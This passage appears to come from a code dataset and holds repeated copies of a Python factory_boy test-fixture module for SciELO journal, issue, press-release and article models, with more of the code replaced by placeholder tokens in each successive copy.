factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass UseLicenseFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass CollectionFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass JournalFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SectionFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n 